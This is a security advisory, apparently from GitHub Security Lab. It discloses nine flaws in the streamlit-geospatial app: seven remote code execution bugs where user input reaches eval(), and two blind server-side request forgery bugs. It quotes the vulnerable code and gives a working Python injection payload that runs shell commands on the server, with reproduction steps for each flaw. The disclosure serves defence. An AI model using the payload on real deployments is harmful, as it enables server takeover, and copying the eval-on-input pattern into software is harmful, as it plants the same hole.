Coordinated Disclosure Timeline


Streamlit-geospatial project contains several remote code execution and blind server-side request forgery vulnerabilities.



Tested Version



Issue 1: Remote code execution in pages/1_πŸ“· Any Earth Engine ImageCollection option palette (GHSL-2024-100)

The palette variable in pages/1_πŸ“· takes user input, which is later used in the eval() function on line 380, leading to remote code execution.

  palette = st.text_area(
      "Enter a custom palette:",
      cm.plot_colormap(cmap=palette_options, return_fig=True)
  st.session_state["palette"] = eval(palette)


This issue may lead to remote code execution.


  1. Start streamlit-geospatial
  2. Go to πŸ“· Timelapse tab and:
    • in Select a satellite image collection: choose Any Earth Engine Image Collection
    • in Enter an ee.ImageCollection asset ID: type ECMWF/CAMS/NRT
  3. Open Customize band combination and color palette and paste into Enter a custom palette:
    __import__('code').InteractiveInterpreter().runsource('import os;os.system(\"echo $(uname -a) > foobar.txt\")')
  4. Observe in the server, that a file foobar.txt has been created, and contains the output of the command uname -a.

Issue 2: Remote code execution in pages/1_πŸ“· Any Earth Engine ImageCollection option vis_params (GHSL-2024-101)

The vis_params variable on line 383 or line 390 in pages/1_πŸ“· takes user input, which is later used in the eval() function on line 395, leading to remote code execution.

 if bands:
    vis_params = st.text_area(
        "Enter visualization parameters",
        "{'bands': ["
        + ", ".join([f"'{band}'" for band in bands])
        + "]}",
    vis_params = st.text_area(
        "Enter visualization parameters",
    st.session_state["vis_params"] = eval(vis_params)


This issue may lead to remote code execution.


  1. Start streamlit-geospatial
  2. Go to πŸ“· Timelapse tab and:
    • in Select a satellite image collection: choose Any Earth Engine Image Collection
    • in Enter an ee.ImageCollection asset ID: type ECMWF/CAMS/NRT
  3. Open Customize band combination and color palette and paste into Enter visualization parameters:
    __import__('code').InteractiveInterpreter().runsource('import os;os.system(\"echo $(uname -a) > foobar.txt\")')
  4. Observe in the server, that a file foobar.txt has been created, and contains the output of the command uname -a.

Issue 3: Remote code execution in pages/1_πŸ“· MODIS Gap filled Land Surface Temperature Daily option (GHSL-2024-102)

The palette variable on line 430 in pages/1_πŸ“· takes user input, which is later used in the eval() function on line 435, leading to remote code execution.

palette = st.text_area(
    "Enter a custom palette:",
st.write(cm.plot_colormap(cmap=palette_options, return_fig=True))
st.session_state["palette"] = eval(palette)


This issue may lead to remote code execution.


  1. Start streamlit-geospatial
  2. Go to πŸ“· Timelapse tab and in Select a satellite image collection: choose MODIS Gap filled Land Surface Temperature Daily
  3. Paste into Enter a custom palette:
    __import__('code').InteractiveInterpreter().runsource('import os;os.system(\"echo $(uname -a) > foobar.txt\")')
  4. Observe in the server, that a file foobar.txt has been created, and contains the output of the command uname -a.

Issue 4: Remote code execution in pages/1_πŸ“· MODIS Ocean Color SMI option palette (GHSL-2024-103)

The palette variable on line 488 in pages/1_πŸ“· takes user input, which is later used in the eval() function on line 493, leading to remote code execution.

palette = st.text_area(
    "Enter a custom palette:",
st.write(cm.plot_colormap(cmap=palette_options, return_fig=True))
st.session_state["palette"] = eval(palette)


This issue may lead to remote code execution.


  1. Start streamlit-geospatial
  2. Go to πŸ“· Timelapse tab and in Select a satellite image collection: choose MODIS Ocean Color SMI
  3. Paste into Enter a custom palette:
    __import__('code').InteractiveInterpreter().runsource('import os;os.system(\"echo $(uname -a) > foobar.txt\")')
  4. Observe in the server, that a file foobar.txt has been created, and contains the output of the command uname -a.

Issue 5: Remote code execution in pages/1_πŸ“· MODIS Ocean Color SMI option vis_params (GHSL-2024-104)

The vis_params variable on line 1254 in pages/1_πŸ“· takes user input, which is later used in the eval() function on line 1345, leading to remote code execution.

vis_params = st.text_area(
    "Enter visualization parameters",
    help="Enter a string in the format of a dictionary, such as '{'min': 23, 'max': 32}'",

--- snip

        elif collection == "MODIS Ocean Color SMI":
            if vis_params.startswith("{") and vis_params.endswith(
                vis_params = eval(vis_params)


This issue may lead to remote code execution.


  1. Start streamlit-geospatial
  2. Go to πŸ“· Timelapse tab and:
    • in Select a satellite image collection: choose MODIS Ocean Color SMI
    • in Select a sample ROI or upload a GeoJSON file choose World
  3. Open Customize timelapse and paste into Enter visualization parameters:
    {__import__('code').InteractiveInterpreter().runsource('import os;os.system(\"echo $(uname -a) > foobar.txt\")')}
  4. Observe in the server, that a file foobar.txt has been created, and contains the output of the command uname -a.

Issue 6: Remote code execution in pages/10_🌍 (GHSL-2024-105)

The vis_params variable on line 115 in pages/10_🌍 takes user input, which is later used in the eval() function on line 126, leading to remote code execution.

vis_params = st.text_input(
    "Enter visualization parameters as a dictionary", {}
layer_name = st.text_input("Enter a layer name", uid)
button = st.button("Add dataset to map")
if button:
    vis = {}
        if vis_params.strip() == "":
            # st.error("Please enter visualization parameters")
            vis_params = "{}"
        vis = eval(vis_params)


This issue may lead to remote code execution.


  1. Start streamlit-geospatial
  2. Go to 🌍 Earth Engine Datasets tab and in Enter a keyword to search (e.g., elevation) type elevation
  3. Paste into Enter visualization parameters as a dictionary:
    __import__('code').InteractiveInterpreter().runsource('import os;os.system(\"echo $(uname -a) > foobar.txt\")')
  4. Observe in the server, that a file foobar.txt has been created, and contains the output of the command uname -a.

Issue 7: Remote code execution in pages/8_🏜️ (GHSL-2024-107)

The vis_params variable on line 80 in 8_🏜️ takes user input, which is later used in the eval() function on line 86, leading to remote code execution.

add_params = st.checkbox("Add visualization parameters")
if add_params:
    vis_params = st.text_area("Enter visualization parameters", "{}")
    vis_params = {}

if len(vis_params) > 0:
        vis_params = eval(vis_params)


This issue may lead to remote code execution.


  1. Start streamlit-geospatial
  2. Go to 🏜️ Raster Data Visualization tab and select Add visualization parameters.
  3. Paste into Enter visualization parameters:
    __import__('code').InteractiveInterpreter().runsource('import os;os.system(\"echo $(uname -a) > foobar.txt\")')
  4. Observe in the server, that a file foobar.txt has been created, and contains the output of the command uname -a.

Issue 8: Blind SSRF in pages/7_πŸ“¦ (GHSL-2024-106)

The url variable on line 47 takes user  input, which is passed to get_layers function, in which url is used with get_wms_layer method. get_wms_layer method creates a request to arbitrary destinations, leading to blind server-side request forgery.

def get_layers(url):
    options = leafmap.get_wms_layers(url)
    return options

--- snip

        url = st.text_input(
            "Enter a WMS URL:", value=""
        empty = st.empty()

        if url:
            options = get_layers(url)


This issue allows for sending requests on behalf of the streamlit-geospatial server and can be leveraged to probe for other vulnerabilities on the server itself or on other back-end systems on the internal network, that the streamlit-geospatial server can reach.

See also:


  1. Start streamlit-geospatial.
  2. Create a new folder with a file file.txt. Start a simple HTTP server in the folder by executing python -m http.server. It will start a server on
  3. Go to πŸ“¦ Web Map Service tab and in Enter a WMS URL: type
  4. Observe that a request to the file was logged in the python server.

Issue 9: Blind SSRF in pages/9_πŸ”² (GHSL-2024-108)

The url variable on line 63 takes user input, which is later passed to the gpd.read_file method. gpd.read_file method creates a request to arbitrary destinations, leading to blind server-side request forgery.

    url = empty.text_input(
        "Enter a HTTP URL to a Cloud Optimized GeoTIFF (COG)",

    if url:
            options = leafmap.cog_bands(url)


This issue allows for sending requests on behalf of the streamlit-geospatial server and can be leveraged to probe for other vulnerabilities on the server itself or on other back-end systems on the internal network, that the streamlit-geospatial server can reach.

See also:


  1. Start streamlit-geospatial.
  2. Create a new folder with a file file.txt. Start a simple HTTP server in the folder by executing python -m http.server. It will start a server on
  3. Go to πŸ”² Vector Data Visualization tab and in Enter a URL to a vector dataset type
  4. Observe that a request to the file was logged in the python server.



These issues were discovered and reported by GHSL team member @sylwia-budzynska (Sylwia Budzynska).


You can contact the GHSL team at, please include a reference to GHSL-2024-100, GHSL-2024-101, GHSL-2024-102, GHSL-2024-103, GHSL-2024-104, GHSL-2024-105, GHSL-2024-106, GHSL-2024-107, or GHSL-2024-108 in any communication regarding these issues.